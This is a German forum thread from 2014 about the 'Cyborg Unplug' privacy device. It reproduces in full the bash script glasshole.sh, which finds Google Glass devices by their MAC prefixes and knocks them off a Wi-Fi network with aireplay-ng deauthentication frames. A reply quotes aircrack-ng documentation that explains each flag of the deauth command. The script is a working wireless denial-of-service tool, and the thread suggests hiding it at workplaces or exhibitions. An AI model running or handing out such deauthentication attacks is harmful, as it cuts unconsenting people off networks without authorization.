Cyborg unplug
lima-city → Forum → Programmiersprachen → Sonstige Programmiersprachen
anschauen
code
dank
exhibition
glauben
host
http
kick
monitor
netzwerk
not
parken
point
set
shell
show
start
tausend
url
welt
-
Hallo,
es giebt da jetzt so ein Gerät das einem in der Welt von Google Glasses noch ein wenig privatsphäre verschaffen soll. Es wirft Macs die zuordnungsbar sind aus dem Netzwerk heraus. Da ich noch nicht ganz verstehe und gelesen habe das eine vorversion als open source veröffentlich wurde würde ich mir das gerne mal anschauen. Aberausser tausenden von Artikeln wo das drinnensteht hab ich nichts gefunden.
Desshalb frage ich euch ob jemand weiß wo man sich das anschauen kann.
Danke im Voraus,
w3j
edit:
Ich glaube ich habe eine Vorversion gefunden:
#!/bin/bash # # GLASSHOLE.SH # # Find and kick Google Glass devices from your local wireless network. Requires # 'beep', 'arp-scan', 'aircrack-ng' and a GNU/Linux host. Put on a BeagleBone # black or Raspberry Pi. Plug in a good USB wireless NIC (like the TL-WN722N) # and wear it, hide it in your workplace or your exhibition. # # Save as glasshole.sh, 'chmod +x glasshole.sh' and exec as follows: # # sudo ./glasshole.sh <WIRELESS NIC> <BSSID OF ACCESS POINT> # # Thanks to Jens Killus for new rev Glass MAC addr and extglob hint (phew). # Thanks to Tim Meusel for line pulling MAC from 'ip' rather than legacy 'ifconfig' shopt -s nocasematch # Set shell to ignore case shopt -s extglob # For non-interactive shell. NIC=$1 # Your wireless NIC BSSID=$2 # Network BSSID (exhibition, workplace, park) MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }') # MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not present. GGMAC='@(F8:8F:CA:24*|F8:8F:CA:25*)' # Match against old and new Glass. POLL=30 # Check every 30 seconds airmon-ng stop mon0 # Pull down any lingering monitor devices airmon-ng start $NIC # Start a monitor device echo ' ___ _ __ __ __ __ __ / _ \___ ___ ( ) /_ / / ___ ___ _ ___ _/ /__ ____ ___ / / ___ / /__ / // / _ \/ _ \|/ __/ / _ \/ -_) / _ `/ / _ `/ / _ `(_-<(_-</ _ \/ _ \/ / -_) /____/\___/_//_/ \__/ /_.__/\__/ \_,_/ \_, /_/\_,_/___/___/_//_/\___/_/\__/ /___/ ' while true; do for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \ '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}') do if [[ $TARGET == $GGMAC ]] then # Audio alert beep -f 1000 -l 500 -n 200 -r 2 echo "Glasshole discovered: "$TARGET echo "De-authing..." aireplay-ng -0 1 -a $BSSID -c $TARGET mon0 else echo $TARGET": is not a Google Glass. Leaving alone.." fi done echo "None found this round." sleep $POLL done airmon-ng stop mon0
aber kann mir vieleicht jemand sagen ob man mit
aireplay-ng <options> <replay interface>
leute aus dem Netzwerk werfen kann und wie das genau funktioniert.
Beitrag zuletzt geändert: 12.11.2014 17:01:04 von w3j -
Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!
lima-city: Gratis werbefreier Webspace für deine eigene Homepage
-
Step 3
http://www.aircrack-ng.org/~~V/doku.php?id=cracking_wpa
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
Where:
-0 means deauthentication
1 is the number of deauths to send (you can send multiple if you wish)
-a 00:14:6C:7E:40:80 is the MAC address of the access point
-c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
ath0 is the interface name
Ich hoffe das hat geholfen -
Ok, Danke nilsmargotti
-
Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!
lima-city: Gratis werbefreier Webspace für deine eigene Homepage